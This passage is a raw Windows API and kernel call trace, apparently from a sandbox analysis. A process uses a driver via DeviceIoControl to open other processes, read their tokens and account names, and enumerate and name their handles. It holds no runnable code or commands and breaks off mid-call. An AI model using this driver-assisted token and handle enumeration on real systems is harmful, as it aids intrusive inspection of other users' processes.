returned 0x5e6a5 [0290.111] ObQueryNameString (in: Object=0xffffe0006a485730, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.111] ObfDereferenceObject (Object=0xffffe0006a485730) returned 0x7ffe [0290.111] IoCompleteRequest () returned 0x0 [0290.111] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.111] PsAcquireProcessExitSynchronization () returned 0x0 [0290.111] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.111] ObReferenceObjectByHandle (in: Handle=0x19d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f5e400, HandleInformation=0x0) returned 0x0 [0290.111] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.111] PsReleaseProcessExitSynchronization () returned 0x2 [0290.112] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a4 [0290.112] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.112] ObfDereferenceObject (Object=0xffffe00069f5e400) returned 0x7ffc [0290.112] IoCompleteRequest () returned 0x0 [0290.112] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.112] PsAcquireProcessExitSynchronization () returned 0x0 [0290.112] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.112] ObReferenceObjectByHandle (in: Handle=0x19fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a391b40, HandleInformation=0x0) returned 0x0 [0290.112] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.112] PsReleaseProcessExitSynchronization () returned 0x2 [0290.112] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a3 [0290.112] ObQueryNameString (in: Object=0xffffe0006a391b40, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.112] ObfDereferenceObject (Object=0xffffe0006a391b40) returned 0x7ffe [0290.112] IoCompleteRequest () returned 0x0 [0290.112] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.112] PsAcquireProcessExitSynchronization () returned 0x0 [0290.112] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.112] ObReferenceObjectByHandle (in: Handle=0x1a50, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000738dcf20, HandleInformation=0x0) returned 0x0 [0290.112] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.112] PsReleaseProcessExitSynchronization () returned 0x2 [0290.112] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a2 [0290.112] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.112] ObfDereferenceObject (Object=0xffffe000738dcf20) returned 0x7ff0 [0290.112] IoCompleteRequest () returned 0x0 [0290.112] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.112] PsAcquireProcessExitSynchronization () returned 0x0 [0290.112] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.112] ObReferenceObjectByHandle (in: Handle=0x1ab8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006921a090, HandleInformation=0x0) returned 0x0 [0290.112] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.112] PsReleaseProcessExitSynchronization () returned 0x2 [0290.112] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a1 [0290.112] ObQueryNameString (in: Object=0xffffe0006921a090, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.112] ObfDereferenceObject (Object=0xffffe0006921a090) returned 0x800e [0290.112] IoCompleteRequest () returned 0x0 [0290.112] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.112] PsAcquireProcessExitSynchronization () returned 0x0 [0290.112] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.112] ObReferenceObjectByHandle (in: Handle=0x1b14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069235090, HandleInformation=0x0) returned 0x0 [0290.112] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.112] PsReleaseProcessExitSynchronization () returned 0x2 [0290.112] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6a0 [0290.112] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.112] ObfDereferenceObject (Object=0xffffe00069235090) returned 0xfffb [0290.112] IoCompleteRequest () returned 0x0 [0290.113] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.113] PsAcquireProcessExitSynchronization () returned 0x0 [0290.113] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.113] ObReferenceObjectByHandle (in: Handle=0x1b2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069975730, HandleInformation=0x0) returned 0x0 [0290.113] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.113] PsReleaseProcessExitSynchronization () returned 0x2 [0290.113] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e69f [0290.113] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.113] ObfDereferenceObject (Object=0xffffe00069975730) returned 0x7fff [0290.113] IoCompleteRequest () returned 0x0 [0290.113] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.113] PsAcquireProcessExitSynchronization () returned 0x0 [0290.113] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.113] ObReferenceObjectByHandle (in: Handle=0x1b58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691fbba0, HandleInformation=0x0) returned 0x0 [0290.113] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.113] PsReleaseProcessExitSynchronization () returned 0x2 [0290.113] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e69e [0290.113] ObQueryNameString (in: Object=0xffffe000691fbba0, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.113] ObfDereferenceObject (Object=0xffffe000691fbba0) returned 0x800d [0290.113] IoCompleteRequest () returned 0x0 [0290.113] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.113] PsAcquireProcessExitSynchronization () returned 0x0 [0290.113] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.113] ObReferenceObjectByHandle (in: Handle=0x1da8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069112090, HandleInformation=0x0) returned 0x0 [0290.113] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.113] PsReleaseProcessExitSynchronization () returned 0x2 [0290.113] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e69d [0290.113] ObQueryNameString (in: Object=0xffffe00069112090, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.113] ObfDereferenceObject (Object=0xffffe00069112090) returned 0x7ffe [0290.113] IoCompleteRequest () returned 0x0 [0290.113] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.113] PsAcquireProcessExitSynchronization () returned 0x0 [0290.113] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.113] ObReferenceObjectByHandle (in: Handle=0x20b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069109630, HandleInformation=0x0) returned 0x0 [0290.113] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.113] PsReleaseProcessExitSynchronization () returned 0x2 [0290.113] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e69c [0290.113] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4087c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4087c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.113] ObfDereferenceObject (Object=0xffffe00069109630) returned 0x7ffe [0290.113] IoCompleteRequest () returned 0x0 [0290.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9b0) returned 0x188 [0290.113] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0290.114] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a00c840, HandleInformation=0x0) returned 0x0 [0290.114] ObOpenObjectByPointer (in: Object=0xffffe0006a00c840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0290.114] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x501b0 [0290.114] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe00069163cc0 | out: TokenHandle=0xffffe00069163cc0*=0x18c) returned 0x0 [0290.114] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0290.114] IoCompleteRequest () returned 0x0 [0290.114] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0290.114] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0290.115] CloseHandle (hObject=0x18c) returned 1 [0290.115] CloseHandle (hObject=0x188) returned 1 [0290.115] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.115] PsAcquireProcessExitSynchronization () returned 0x0 [0290.115] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.115] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a034730, HandleInformation=0x0) returned 0x0 [0290.115] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.115] PsReleaseProcessExitSynchronization () returned 0x2 [0290.115] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481ae [0290.115] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000691a47c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe000691a47c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.115] ObfDereferenceObject (Object=0xffffe0006a034730) returned 0x7ffe [0290.115] IoCompleteRequest () returned 0x0 [0290.115] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.115] PsAcquireProcessExitSynchronization () returned 0x0 [0290.115] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.115] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000717fd090, HandleInformation=0x0) returned 0x0 [0290.115] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.115] PsReleaseProcessExitSynchronization () returned 0x2 [0290.115] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481ad [0290.115] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.115] ObfDereferenceObject (Object=0xffffe000717fd090) returned 0x7ffe [0290.115] IoCompleteRequest () returned 0x0 [0290.115] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.115] PsAcquireProcessExitSynchronization () returned 0x0 [0290.115] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.115] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007c2fd280, HandleInformation=0x0) returned 0x0 [0290.115] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.115] PsReleaseProcessExitSynchronization () returned 0x2 [0290.115] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481ac [0290.115] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.115] ObfDereferenceObject (Object=0xffffe0007c2fd280) returned 0x7ffc [0290.115] IoCompleteRequest () returned 0x0 [0290.115] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.116] PsAcquireProcessExitSynchronization () returned 0x0 [0290.116] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.116] ObReferenceObjectByHandle (in: Handle=0x198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a08b4c0, HandleInformation=0x0) returned 0x0 [0290.116] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.116] PsReleaseProcessExitSynchronization () returned 0x2 [0290.116] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481ab [0290.116] ObQueryNameString (in: Object=0xffffe0006a08b4c0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.116] ObfDereferenceObject (Object=0xffffe0006a08b4c0) returned 0x7ffe [0290.116] IoCompleteRequest () returned 0x0 [0290.116] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.116] PsAcquireProcessExitSynchronization () returned 0x0 [0290.116] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.116] ObReferenceObjectByHandle (in: Handle=0x60c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006984df20, HandleInformation=0x0) returned 0x0 [0290.116] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.116] PsReleaseProcessExitSynchronization () returned 0x2 [0290.116] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481aa [0290.116] ObQueryNameString (in: Object=0xffffe0006984df20, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.116] ObfDereferenceObject (Object=0xffffe0006984df20) returned 0x7ff9 [0290.116] IoCompleteRequest () returned 0x0 [0290.116] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.116] PsAcquireProcessExitSynchronization () returned 0x0 [0290.116] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.116] ObReferenceObjectByHandle (in: Handle=0x764, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007fdfe410, HandleInformation=0x0) returned 0x0 [0290.116] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.116] PsReleaseProcessExitSynchronization () returned 0x2 [0290.116] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481a9 [0290.116] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.116] ObfDereferenceObject (Object=0xffffe0007fdfe410) returned 0x7ffc [0290.116] IoCompleteRequest () returned 0x0 [0290.116] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.116] PsAcquireProcessExitSynchronization () returned 0x0 [0290.116] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.116] ObReferenceObjectByHandle (in: Handle=0x7a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006980f200, HandleInformation=0x0) returned 0x0 [0290.116] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.116] PsReleaseProcessExitSynchronization () returned 0x2 [0290.116] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481a8 [0290.116] ObQueryNameString (in: Object=0xffffe0006980f200, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.116] ObfDereferenceObject (Object=0xffffe0006980f200) returned 0x7ffe [0290.116] IoCompleteRequest () returned 0x0 [0290.116] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.116] PsAcquireProcessExitSynchronization () returned 0x0 [0290.116] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.116] ObReferenceObjectByHandle (in: Handle=0x7dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a397f0, HandleInformation=0x0) returned 0x0 [0290.117] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.117] PsReleaseProcessExitSynchronization () returned 0x2 [0290.117] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481a7 [0290.117] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.117] ObfDereferenceObject (Object=0xffffe00069a397f0) returned 0x800d [0290.117] IoCompleteRequest () returned 0x0 [0290.117] PsLookupProcessByProcessId (in: ProcessId=0x9b0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.117] PsAcquireProcessExitSynchronization () returned 0x0 [0290.117] KeStackAttachProcess (in: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a00c840, ApcState=0xffffd000ac0cf400) [0290.117] ObReferenceObjectByHandle (in: Handle=0x7e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a316710, HandleInformation=0x0) returned 0x0 [0290.117] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.117] PsReleaseProcessExitSynchronization () returned 0x2 [0290.117] ObfDereferenceObject (Object=0xffffe0006a00c840) returned 0x481a6 [0290.117] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.117] ObfDereferenceObject (Object=0xffffe0006a316710) returned 0x800d [0290.117] IoCompleteRequest () returned 0x0 [0290.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa1c) returned 0x188 [0290.117] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0290.117] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a0e0080, HandleInformation=0x0) returned 0x0 [0290.117] ObOpenObjectByPointer (in: Object=0xffffe0006a0e0080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0290.117] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x60093 [0290.117] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe00069163cc0 | out: TokenHandle=0xffffe00069163cc0*=0x18c) returned 0x0 [0290.117] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0290.117] IoCompleteRequest () returned 0x0 [0290.117] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0290.117] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0290.118] CloseHandle (hObject=0x18c) returned 1 [0290.118] CloseHandle (hObject=0x188) returned 1 [0290.118] PsLookupProcessByProcessId (in: ProcessId=0xa1c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.118] PsAcquireProcessExitSynchronization () returned 0x0 [0290.118] KeStackAttachProcess (in: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0e0080, ApcState=0xffffd000ac0cf400) [0290.118] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffff803f3beab01, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a1464e0, HandleInformation=0x0) returned 0x0 [0290.118] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.118] PsReleaseProcessExitSynchronization () returned 0x2 [0290.118] ObfDereferenceObject (Object=0xffffe0006a0e0080) returned 0x58091 [0290.118] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.118] ObfDereferenceObject (Object=0xffffe0006a1464e0) returned 0x7ffe [0290.118] IoCompleteRequest () returned 0x0 [0290.118] PsLookupProcessByProcessId (in: 